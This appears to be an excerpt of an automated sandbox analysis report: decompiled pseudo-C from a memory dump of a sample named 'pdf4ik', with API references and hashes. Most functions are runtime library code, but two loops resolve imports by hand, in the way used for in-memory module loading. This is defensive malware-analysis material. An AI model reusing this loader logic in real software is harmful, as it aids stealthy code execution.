                                        				intOrPtr _v16;
                                        				char* _t16;
                                        				intOrPtr* _t18;
                                        				void* _t21;
                                        				intOrPtr* _t24;
                                        				intOrPtr _t27;
                                        				intOrPtr _t29;
                                        				intOrPtr* _t32;
                                        				char* _t37;
                                        				intOrPtr* _t39;
                                        
                                        				_t16 =  &_v8;
                                        				_t29 = 0;
                                        				_v8 = 0;
                                        				__imp__CoCreateInstance(0x29dc57a0, 0, 1, 0x29dd09a4, _t16);
                                        				if(_t16 >= 0) {
                                        					__imp__#2(_a4);
                                        					_v16 = _t16;
                                        					if(_t16 != 0) {
                                        						_t32 = _v8;
                                        						_t21 =  *((intOrPtr*)( *((intOrPtr*)( *_t32 + 0x20))))(_t32, _t16);
                                        						_t39 = __imp__#6;
                                        						if(_t21 >= 0) {
                                        							_t24 = _v8;
                                        							_t37 =  &_v12;
                                        							_push(_t37);
                                        							_push(0xffffffff);
                                        							_push(_t24);
                                        							if( *((intOrPtr*)( *((intOrPtr*)( *_t24 + 0xb4))))() >= 0) {
                                        								_t27 = E29DAFC37(_v12);
                                        								 *((intOrPtr*)(__esi + 4)) = _t37;
                                        								 *__esi = _t27;
                                        								_t29 = 1;
                                        								 *_t39(_v12);
                                        							}
                                        						}
                                        						 *_t39(_v16);
                                        					}
                                        					_t18 = _v8;
                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t18 + 8))))(_t18);
                                        				}
                                        				return _t29;
                                        			}
















                                        APIs
                                        • CoCreateInstance.OLE32(29DC57A0,00000000,00000001,29DD09A4,?,00000010,00000000,?,29DA3F26,?), ref: 29DA3D6E
                                        • SysAllocString.OLEAUT32(29DA3F26), ref: 29DA3D7C
                                        • SysFreeString.OLEAUT32(?), ref: 29DA3DD4
                                          • Part of subcall function 29DAFC37: __wcstoi64.LIBCMT ref: 29DAFC43
                                        • SysFreeString.OLEAUT32(29DA3F26), ref: 29DA3DCE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$Free$AllocCreateInstance__wcstoi64
                                        • String ID: )
                                        • API String ID: 3478848241-2427484129
                                        • Opcode ID: 67e5570bc264c46d5cbfcc6f2c9cdae178a802e89db6c0724706efadfcd14368
                                        • Instruction ID: 70d63b6225e7428f07f39ffa5331b43704f04b2c6dca5122c7ba8c8383b6ad03
                                        • Opcode Fuzzy Hash: 67e5570bc264c46d5cbfcc6f2c9cdae178a802e89db6c0724706efadfcd14368
                                        • Instruction Fuzzy Hash: 0E1160B5700209FFDB00EFA9CC84D9AF7B9AF88244B1086ACE615D7240D635EE01DB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 82%
                                        			E29D98890(void* __edi, intOrPtr _a4) {
                                        				char _v8;
                                        				char _v16;
                                        				char* _v20;
                                        				char _v32;
                                        				void* __ebx;
                                        				void* __esi;
                                        				signed int _t20;
                                        				void* _t37;
                                        				intOrPtr _t39;
                                        				signed int _t41;
                                        
                                        				_t37 = __edi;
                                        				_push(0xffffffff);
                                        				_push(E29DC1BE4);
                                        				_push( *[fs:0x0]);
                                        				_t20 =  *0x29dd5664; // 0xd9555f04
                                        				_push(_t20 ^ _t41);
                                        				 *[fs:0x0] =  &_v16;
                                        				_t39 = _a4;
                                        				E29DADA5D(_t39, 0);
                                        				_v8 = 0;
                                        				 *((intOrPtr*)(_t39 + 4)) = 0;
                                        				 *((char*)(_t39 + 8)) = 0;
                                        				 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                        				 *((char*)(_t39 + 0x10)) = 0;
                                        				 *((intOrPtr*)(_t39 + 0x14)) = 0;
                                        				 *((char*)(_t39 + 0x18)) = 0;
                                        				 *((intOrPtr*)(_t39 + 0x1c)) = 0;
                                        				 *((char*)(_t39 + 0x20)) = 0;
                                        				_v8 = 4;
                                        				_t45 = __edi;
                                        				if(__edi == 0) {
                                        					_v20 = "bad locale name";
                                        					E29DAE0FC( &_v32,  &_v20);
                                        					_v32 = 0x29dc5260;
                                        					E29DAFF06( &_v32, 0x29dd2060);
                                        				}
                                        				E29DAD884(0, _t37, _t39, _t45, _t39, _t37);
                                        				 *[fs:0x0] = _v16;
                                        				return _t39;
                                        			}














                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29D988BF
                                        • std::exception::exception.LIBCMT ref: 29D988F5
                                          • Part of subcall function 29DAE0FC: std::exception::_Copy_str.LIBCMT ref: 29DAE117
                                        • __CxxThrowException@8.LIBCMT ref: 29D9890A
                                          • Part of subcall function 29DAFF06: RaiseException.KERNEL32(29D89803,00000001,D9555F04,29DC52AC,29D89803,00000001,29DD2028,29D851F1,D9555F04), ref: 29DAFF48
                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 29D98911
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
                                        • String ID: bad locale name
                                        • API String ID: 73090415-1405518554
                                        • Opcode ID: 6e45f4de8a61a09199530ca72865051260c65d2fb036add3490884fd73d07996
                                        • Instruction ID: 6b245b2a63bccee8a62885d9c3d8c54294eba48391119fcf1d963c9b86368ebd
                                        • Opcode Fuzzy Hash: 6e45f4de8a61a09199530ca72865051260c65d2fb036add3490884fd73d07996
                                        • Instruction Fuzzy Hash: 071182B2804648AFC711DF998880A9FFBF8FB29610F80866ED55593A40D7346605DBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 30%
                                        			E29DB277A(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                        				void* __ebp;
                                        				void* _t20;
                                        				void* _t22;
                                        				void* _t23;
                                        				void* _t25;
                                        				intOrPtr* _t26;
                                        				void* _t27;
                                        				void* _t28;
                                        
                                        				_t27 = __esi;
                                        				_t26 = __edi;
                                        				_t25 = __edx;
                                        				_t23 = __ecx;
                                        				_t22 = __ebx;
                                        				_t30 = _a20;
                                        				if(_a20 != 0) {
                                        					_push(_a20);
                                        					_push(__ebx);
                                        					_push(__esi);
                                        					_push(_a4);
                                        					E29DB26E8(__ebx, __edi, __esi, _t30);
                                        					_t28 = _t28 + 0x10;
                                        				}
                                        				_t31 = _a28;
                                        				_push(_a4);
                                        				if(_a28 != 0) {
                                        					_push(_a28);
                                        				} else {
                                        					_push(_t27);
                                        				}
                                        				E29DB03AA(_t23);
                                        				_push( *_t26);
                                        				_push(_a16);
                                        				_push(_a12);
                                        				_push(_t27);
                                        				E29DB2159(_t22, _t25, _t26, _t27, _t31);
                                        				_push(0x100);
                                        				_push(_a24);
                                        				_push(_a16);
                                        				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
                                        				_push(_a8);
                                        				_t14 = _t22 + 0xc; // 0x6e
                                        				_push(_t27);
                                        				_push(_a4);
                                        				_t20 = E29DB23CD(_t22,  *_t14, _t25, _t26, _t27, _t31);
                                        				if(_t20 != 0) {
                                        					E29DB0371(_t20, _t27);
                                        					return _t20;
                                        				}
                                        				return _t20;
                                        			}












                                        APIs
                                        • ___BuildCatchObject.LIBCMT ref: 29DB278D
                                          • Part of subcall function 29DB26E8: ___BuildCatchObjectHelper.LIBCMT ref: 29DB271E
                                        • _UnwindNestedFrames.LIBCMT ref: 29DB27A4
                                        • ___FrameUnwindToState.LIBCMT ref: 29DB27B2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                        • String ID: csm$csm
                                        • API String ID: 2163707966-3733052814
                                        • Opcode ID: d9ab484e12d52535e9e60eae61805b5416c87f709676d90ae6157c4ff97f398b
                                        • Instruction ID: 0408cdcc56ca8db536a32bf4d19468ef523f3b326df658e9d9c3a6ab23eac8b4
                                        • Opcode Fuzzy Hash: d9ab484e12d52535e9e60eae61805b5416c87f709676d90ae6157c4ff97f398b
                                        • Instruction Fuzzy Hash: F501FB77001109BFDF125F91CC94F9A7F6AFF28394F108018BE1929520D7329572EBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 75%
                                        			E29DA46C0(void* __ebx, void* __edi, void* __eflags) {
                                        				void* __esi;
                                        				signed int _t12;
                                        				void* _t18;
                                        				void* _t21;
                                        				void* _t23;
                                        				CHAR* _t24;
                                        				void* _t25;
                                        				void* _t27;
                                        
                                        				_t24 = E29DADFE0(_t18, __edi, _t23, __ebx);
                                        				 *_t24 = 0;
                                        				E29DAFCE4(GetTickCount());
                                        				_t27 = _t25 + 8;
                                        				_t29 = __ebx;
                                        				if(__ebx <= 0) {
                                        					 *((char*)(0 + _t24)) = 0;
                                        					return _t24;
                                        				} else {
                                        					_push(__edi);
                                        					_t21 = __ebx;
                                        					do {
                                        						_t12 = E29DAFCF6(_t29);
                                        						asm("cdq");
                                        						_push(_t12 % 0xa);
                                        						_push(_t24);
                                        						wsprintfA(_t24, "%s%d");
                                        						_t27 = _t27 + 0x10;
                                        						_t21 = _t21 - 1;
                                        					} while (_t21 != 0);
                                        					 *((char*)(__ebx + _t24)) = 0;
                                        					return _t24;
                                        				}
                                        			}












                                        APIs
                                        • _malloc.LIBCMT ref: 29DA46C2
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetTickCount.KERNEL32 ref: 29DA46CF
                                          • Part of subcall function 29DAFCE4: __getptd.LIBCMT ref: 29DAFCE9
                                        • _rand.LIBCMT ref: 29DA46E7
                                          • Part of subcall function 29DAFCF6: __getptd.LIBCMT ref: 29DAFCF6
                                        • wsprintfA.USER32 ref: 29DA46FC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __getptd$AllocateCountHeapTick_malloc_randwsprintf
                                        • String ID: %s%d
                                        • API String ID: 2840978672-1110647743
                                        • Opcode ID: 1d24f62f307d17e38deac55572f953c38d576b5cf6ebf1b0a63e7d4b35bc5f40
                                        • Instruction ID: 06a41907442a77253975f2161c45cbcf5dad0deb531b83560ff95e2cbd269138
                                        • Opcode Fuzzy Hash: 1d24f62f307d17e38deac55572f953c38d576b5cf6ebf1b0a63e7d4b35bc5f40
                                        • Instruction Fuzzy Hash: 08F0EC536012D12BE7112A7D6C85B8B69588FA1150F5844BEF849C7602DD6CDC52A3F2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 98%
                                        			E29D84B60(void* __edi) {
                                        				intOrPtr* _v8;
                                        				struct HINSTANCE__* _v12;
                                        				intOrPtr _v16;
                                        				void* __esi;
                                        				intOrPtr _t37;
                                        				intOrPtr _t39;
                                        				signed int _t42;
                                        				intOrPtr _t44;
                                        				signed short _t45;
                                        				CHAR* _t46;
                                        				_Unknown_base(*)()* _t47;
                                        				signed int _t49;
                                        				intOrPtr* _t59;
                                        				signed short* _t61;
                                        				intOrPtr _t64;
                                        				intOrPtr* _t69;
                                        				struct HINSTANCE__* _t73;
                                        				void* _t76;
                                        				signed short* _t77;
                                        				intOrPtr _t79;
                                        				void* _t85;
                                        				void* _t86;
                                        				void* _t87;
                                        
                                        				_t76 = __edi;
                                        				_t37 =  *((intOrPtr*)(__edi + 0xc0));
                                        				_t86 = _t85 - 0xc;
                                        				if(_t37 == 0 ||  *((intOrPtr*)(__edi + 0xc4)) == 0) {
                                        					return 0;
                                        				} else {
                                        					_t59 =  *((intOrPtr*)(__edi + 0x144)) + _t37;
                                        					_t39 =  *((intOrPtr*)(_t59 + 0xc));
                                        					_push(_t77);
                                        					_v8 = _t59;
                                        					if(_t39 != 0) {
                                        						while(1) {
                                        							_t73 = LoadLibraryA( *((intOrPtr*)(_t76 + 0x144)) + _t39);
                                        							_v12 = _t73;
                                        							if(_t73 == 0) {
                                        								break;
                                        							}
                                        							_t42 =  *(_t76 + 0x154);
                                        							if( *(_t76 + 0x150) < _t42) {
                                        								_t79 = _v16;
                                        								goto L15;
                                        							} else {
                                        								if(_t42 == 0) {
                                        									_t49 = 0x10;
                                        								} else {
                                        									_t49 = _t42 + _t42;
                                        								}
                                        								 *(_t76 + 0x154) = _t49;
                                        								_t79 = E29DADFE0(_t49 * 4, _t76, _t77, _t49 * 4);
                                        								_t87 = _t86 + 4;
                                        								_v16 = _t79;
                                        								if(_t79 == 0) {
                                        									return 3;
                                        								} else {
                                        									_t52 =  *(_t76 + 0x150);
                                        									if( *(_t76 + 0x150) != 0) {
                                        										E29DB0010(_t79,  *((intOrPtr*)(_t76 + 0x14c)), _t52 + _t52 + _t52 + _t52);
                                        										_t87 = _t87 + 0xc;
                                        									}
                                        									E29DADFA6( *((intOrPtr*)(_t76 + 0x14c)));
                                        									_t73 = _v12;
                                        									_t86 = _t87 + 4;
                                        									 *((intOrPtr*)(_t76 + 0x14c)) = _t79;
                                        									L15:
                                        									_t69 = _v8;
                                        									 *(_t79 +  *(_t76 + 0x150) * 4) = _t73;
                                        									 *(_t76 + 0x150) =  *(_t76 + 0x150) + 1;
                                        									_t44 =  *((intOrPtr*)(_t76 + 0x144));
                                        									_t77 =  *((intOrPtr*)(_t59 + 0x10)) + _t44;
                                        									_t61 = _t77;
                                        									if( *((intOrPtr*)(_t69 + 4)) == 0) {
                                        										L18:
                                        										_t45 =  *_t61;
                                        										if(_t45 == 0) {
                                        											L27:
                                        											_t39 =  *((intOrPtr*)(_t69 + 0x20));
                                        											_v8 = _t69 + 0x14;
                                        											if(_t39 != 0) {
                                        												_t59 = _v8;
                                        												continue;
                                        											} else {
                                        												return _t39;
                                        											}
                                        										} else {
                                        											L21:
                                        											L21:
                                        											if(_t45 >= 0) {
                                        												_t46 = _t45 +  *((intOrPtr*)(_t76 + 0x144)) + 2;
                                        											} else {
                                        												_t46 = _t45 & 0x0000ffff;
                                        											}
                                        											_t47 = GetProcAddress(_t73, _t46);
                                        											 *_t77 = _t47;
                                        											if(_t47 == 0) {
                                        												break;
                                        											}
                                        											_t45 = _t61[2];
                                        											_t61 =  &(_t61[2]);
                                        											_t77 =  &(_t77[2]);
                                        											if(_t45 != 0) {
                                        												_t73 = _v12;
                                        												goto L21;
                                        											} else {
                                        												_t69 = _v8;
                                        												goto L27;
                                        											}
                                        										}
                                        									} else {
                                        										_t64 =  *_t69;
                                        										if(_t64 == 0) {
                                        											return 8;
                                        										} else {
                                        											_t61 = _t64 + _t44;
                                        											goto L18;
                                        										}
                                        									}
                                        								}
                                        							}
                                        							goto L33;
                                        						}
                                        						return 6;
                                        					} else {
                                        						return _t39;
                                        					}
                                        				}
                                        				L33:
                                        			}



























                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressLibraryLoadProc_free_malloc_memmove
                                        • String ID:
                                        • API String ID: 2200627730-0
                                        • Opcode ID: f7c01d0856f4ef7a66c74bab585721b27d9f770cb8cb1b8fde786551f84ba76a
                                        • Instruction ID: c6821c851a3761640ac4e9ec43f1bec4b9a4814317685b570462bdc9e22d99ca
                                        • Opcode Fuzzy Hash: f7c01d0856f4ef7a66c74bab585721b27d9f770cb8cb1b8fde786551f84ba76a
                                        • Instruction Fuzzy Hash: E2411E71B01606ABD708CEA9D984BA5F3A8BF48355F0441ADDD0CDB706E735F922AB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 91%
                                        			E29DAC210(void* __ebx, void* __ecx, intOrPtr _a4) {
                                        				signed int _v12;
                                        				struct _SYSTEMTIME _v28;
                                        				signed int _v32;
                                        				signed int _v36;
                                        				struct _FILETIME _v44;
                                        				void* _v48;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t45;
                                        				long _t48;
                                        				intOrPtr _t52;
                                        				intOrPtr _t58;
                                        				long _t73;
                                        				long _t83;
                                        				void* _t87;
                                        				void* _t89;
                                        				signed int _t91;
                                        
                                        				_t66 = __ebx;
                                        				_t45 =  *0x29dd5664; // 0xd9555f04
                                        				_v12 = _t45 ^ _t91;
                                        				_t87 = __ecx;
                                        				_v48 = __ecx;
                                        				 *(__ebx + 0x7c) = 0;
                                        				 *((intOrPtr*)(__ebx + 0x84)) = 0;
                                        				 *((char*)(__ebx + 0x80)) = 0;
                                        				 *((intOrPtr*)(__ebx + 0x78)) = 0;
                                        				 *((intOrPtr*)(__ebx + 0x70)) = 0;
                                        				 *((intOrPtr*)(__ebx + 0x90)) = 0;
                                        				 *((intOrPtr*)(__ebx + 0x74)) = 0;
                                        				if(__ecx == 0 || __ecx == 0xffffffff) {
                                        					_t48 = 0x10000;
                                        					goto L9;
                                        				} else {
                                        					if(SetFilePointer( *(__ebx + 4), 0, 0, 1) == 0xffffffff) {
                                        						_t52 = _a4;
                                        						 *((intOrPtr*)(__ebx + 0x4c)) = 0x80000000;
                                        						 *((intOrPtr*)(__ebx + 0x70)) = 0xffffffff;
                                        						if(_t52 != 0) {
                                        							 *((intOrPtr*)(__ebx + 0x70)) = _t52;
                                        						}
                                        						 *((char*)(_t66 + 0x6c)) = 0;
                                        						GetLocalTime( &_v28);
                                        						SystemTimeToFileTime( &_v28,  &_v44);
                                        						_t83 = _v44.dwLowDateTime;
                                        						E29DABC00( &_v32,  &_v36, _t83);
                                        						asm("sbb ecx, 0x19db1de");
                                        						_t58 = E29DB75A0(_v44.dwLowDateTime - 0xd53e8000, _v44.dwHighDateTime, 0x989680, 0);
                                        						_t73 = _t83;
                                        						 *(_t66 + 0x54) = _t83;
                                        						 *((intOrPtr*)(_t66 + 0x50)) = _t58;
                                        						 *((intOrPtr*)(_t66 + 0x58)) = _t58;
                                        						 *((intOrPtr*)(_t66 + 0x60)) = _t58;
                                        						 *(_t66 + 0x5c) = _t73;
                                        						 *(_t66 + 0x64) = _t73;
                                        						 *(_t66 + 0x68) = (_v36 & 0x0000ffff) << 0x00000010 | _v32 & 0x0000ffff;
                                        						 *((intOrPtr*)(_t66 + 0x7c)) = _v48;
                                        						return E29DADF46(0, _t66, _v12 ^ _t91, (_v36 & 0x0000ffff) << 0x00000010 | _v32 & 0x0000ffff,  &_v32,  &_v36, _v44.dwHighDateTime);
                                        					} else {
                                        						_t81 = __ebx + 0x68;
                                        						_t48 = E29DABC70(__ebx + 0x70, __ebx + 0x68, _t87, __ebx + 0x4c, __ebx + 0x50);
                                        						if(_t48 != 0) {
                                        							L9:
                                        							return E29DADF46(_t48, _t66, _v12 ^ _t91, _t81, _t87, _t89);
                                        						} else {
                                        							SetFilePointer(_t87, _t48, _t48, _t48);
                                        							 *((char*)(__ebx + 0x6c)) = 1;
                                        							 *(__ebx + 0x7c) = _t87;
                                        							return E29DADF46(0, __ebx, _v12 ^ _t91, _t81, _t87, _t89);
                                        						}
                                        					}
                                        				}
                                        			}





















                                        APIs
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,29D8F602,?,?,?,?,?,?,?,29DAC973,?,?,?), ref: 29DAC260
                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,29DAC973,?), ref: 29DAC28E
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,29DAC973,?,?,?), ref: 29DAC2CF
                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,29DAC973,?,?,?), ref: 29DAC2DD
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29DAC313
                                          • Part of subcall function 29DABC70: GetFileInformationByHandle.KERNEL32(?,?,?,?,?), ref: 29DABC9A
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Time$Pointer$HandleInformationLocalSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 89576305-0
                                        • Opcode ID: 0305df31fcd6b18acafbe5e59c64af31b70ca02ba55ddf3e6afc4e07c1809ba1
                                        • Instruction ID: 8b15310a354d521f776d6242e2e49331013db74e66432815a2cd91f5c7aaa965
                                        • Opcode Fuzzy Hash: 0305df31fcd6b18acafbe5e59c64af31b70ca02ba55ddf3e6afc4e07c1809ba1
                                        • Instruction Fuzzy Hash: 3E4133B29002449FCB44DF79D880AAA7BF9EF58310F0081AEED15DB246EB349555DB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29D84B9B(intOrPtr __eax, void* __edi, signed short* __esi) {
                                        				intOrPtr _t32;
                                        				signed int _t35;
                                        				intOrPtr _t37;
                                        				signed short _t38;
                                        				CHAR* _t39;
                                        				_Unknown_base(*)()* _t40;
                                        				signed int _t42;
                                        				intOrPtr _t50;
                                        				signed short* _t52;
                                        				intOrPtr _t54;
                                        				intOrPtr* _t59;
                                        				struct HINSTANCE__* _t63;
                                        				void* _t66;
                                        				signed short* _t67;
                                        				intOrPtr _t69;
                                        				void* _t74;
                                        				void* _t79;
                                        				void* _t81;
                                        
                                        				_t67 = __esi;
                                        				_t66 = __edi;
                                        				_t32 = __eax;
                                        				while(1) {
                                        					_t50 =  *((intOrPtr*)(_t74 - 4));
                                        					_t63 = LoadLibraryA( *((intOrPtr*)(_t66 + 0x144)) + _t32);
                                        					 *(_t74 - 8) = _t63;
                                        					if(_t63 == 0) {
                                        						break;
                                        					}
                                        					_t35 =  *(_t66 + 0x154);
                                        					if( *(_t66 + 0x150) < _t35) {
                                        						_t69 =  *((intOrPtr*)(_t74 - 0xc));
                                        						goto L12;
                                        					} else {
                                        						if(_t35 == 0) {
                                        							_t42 = 0x10;
                                        						} else {
                                        							_t42 = _t35 + _t35;
                                        						}
                                        						 *(_t66 + 0x154) = _t42;
                                        						_t69 = E29DADFE0(_t42 * 4, _t66, _t67, _t42 * 4);
                                        						_t81 = _t79 + 4;
                                        						 *((intOrPtr*)(_t74 - 0xc)) = _t69;
                                        						if(_t69 == 0) {
                                        							return 3;
                                        						} else {
                                        							_t45 =  *(_t66 + 0x150);
                                        							if( *(_t66 + 0x150) != 0) {
                                        								E29DB0010(_t69,  *((intOrPtr*)(_t66 + 0x14c)), _t45 + _t45 + _t45 + _t45);
                                        								_t81 = _t81 + 0xc;
                                        							}
                                        							E29DADFA6( *((intOrPtr*)(_t66 + 0x14c)));
                                        							_t63 =  *(_t74 - 8);
                                        							_t79 = _t81 + 4;
                                        							 *((intOrPtr*)(_t66 + 0x14c)) = _t69;
                                        							L12:
                                        							_t59 =  *((intOrPtr*)(_t74 - 4));
                                        							 *(_t69 +  *(_t66 + 0x150) * 4) = _t63;
                                        							 *(_t66 + 0x150) =  *(_t66 + 0x150) + 1;
                                        							_t37 =  *((intOrPtr*)(_t66 + 0x144));
                                        							_t67 =  *((intOrPtr*)(_t50 + 0x10)) + _t37;
                                        							_t52 = _t67;
                                        							if( *((intOrPtr*)(_t59 + 4)) == 0) {
                                        								L15:
                                        								_t38 =  *_t52;
                                        								if(_t38 == 0) {
                                        									L24:
                                        									_t32 =  *((intOrPtr*)(_t59 + 0x20));
                                        									 *((intOrPtr*)(_t74 - 4)) = _t59 + 0x14;
                                        									if(_t32 != 0) {
                                        										continue;
                                        									} else {
                                        										return _t32;
                                        									}
                                        								} else {
                                        									L18:
                                        									while(1) {
                                        										if(_t38 >= 0) {
                                        											_t39 = _t38 +  *((intOrPtr*)(_t66 + 0x144)) + 2;
                                        										} else {
                                        											_t39 = _t38 & 0x0000ffff;
                                        										}
                                        										_t40 = GetProcAddress(_t63, _t39);
                                        										 *_t67 = _t40;
                                        										if(_t40 == 0) {
                                        											goto L28;
                                        										} else {
                                        											_t38 = _t52[2];
                                        											_t52 =  &(_t52[2]);
                                        											_t67 =  &(_t67[2]);
                                        											if(_t38 != 0) {
                                        												_t63 =  *(_t74 - 8);
                                        												continue;
                                        											} else {
                                        												_t59 =  *((intOrPtr*)(_t74 - 4));
                                        												goto L24;
                                        											}
                                        										}
                                        										goto L29;
                                        									}
                                        								}
                                        							} else {
                                        								_t54 =  *_t59;
                                        								if(_t54 == 0) {
                                        									return 8;
                                        								} else {
                                        									_t52 = _t54 + _t37;
                                        									goto L15;
                                        								}
                                        							}
                                        						}
                                        					}
                                        					L29:
                                        				}
                                        				L28:
                                        				return 6;
                                        				goto L29;
                                        			}






















                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressLibraryLoadProc_free_malloc_memmove
                                        • String ID:
                                        • API String ID: 2200627730-0
                                        • Opcode ID: 70ea5f1bc721139ae5303620f47469c07b6a6aaf37212f15d066cb36ffd510d0
                                        • Instruction ID: c6e7b50ac616fd67eada69a28364b60cac86c014c24c31c618c87a329462a479
                                        • Opcode Fuzzy Hash: 70ea5f1bc721139ae5303620f47469c07b6a6aaf37212f15d066cb36ffd510d0
                                        • Instruction Fuzzy Hash: 97311EB1B01602EBD708CF69D984BA6B7A8BF44345F04816DDD0D9B706E735F923AB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 94%
                                        			E29DBBBBC(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
                                        				void* _t7;
                                        				long _t8;
                                        				intOrPtr* _t9;
                                        				intOrPtr* _t12;
                                        				long _t27;
                                        				long _t30;
                                        
                                        				if(_a4 != 0) {
                                        					_push(__esi);
                                        					_t30 = _a8;
                                        					__eflags = _t30;
                                        					if(_t30 != 0) {
                                        						_push(__edi);
                                        						while(1) {
                                        							__eflags = _t30 - 0xffffffe0;
                                        							if(_t30 > 0xffffffe0) {
                                        								break;
                                        							}
                                        							__eflags = _t30;
                                        							if(_t30 == 0) {
                                        								_t30 = _t30 + 1;
                                        								__eflags = _t30;
                                        							}
                                        							_t7 = HeapReAlloc( *0x29dd702c, 0, _a4, _t30);
                                        							_t27 = _t7;
                                        							__eflags = _t27;
                                        							if(_t27 != 0) {
                                        								L17:
                                        								_t8 = _t27;
                                        							} else {
                                        								__eflags =  *0x29dd7694 - _t7;
                                        								if(__eflags == 0) {
                                        									_t9 = E29DB2030(__eflags);
                                        									 *_t9 = E29DB1FEE(GetLastError());
                                        									goto L17;
                                        								} else {
                                        									__eflags = E29DB35CE(_t7, _t30);
                                        									if(__eflags == 0) {
                                        										_t12 = E29DB2030(__eflags);
                                        										 *_t12 = E29DB1FEE(GetLastError());
                                        										L12:
                                        										_t8 = 0;
                                        										__eflags = 0;
                                        									} else {
                                        										continue;
                                        									}
                                        								}
                                        							}
                                        							goto L14;
                                        						}
                                        						E29DB35CE(_t6, _t30);
                                        						 *((intOrPtr*)(E29DB2030(__eflags))) = 0xc;
                                        						goto L12;
                                        					} else {
                                        						E29DADFA6(_a4);
                                        						_t8 = 0;
                                        					}
                                        					L14:
                                        					return _t8;
                                        				} else {
                                        					return E29DADFE0(__edx, __edi, __esi, _a8);
                                        				}
                                        			}









                                        APIs
                                        • _malloc.LIBCMT ref: 29DBBBCA
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • _free.LIBCMT ref: 29DBBBDD
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap_free_malloc
                                        • String ID:
                                        • API String ID: 1020059152-0
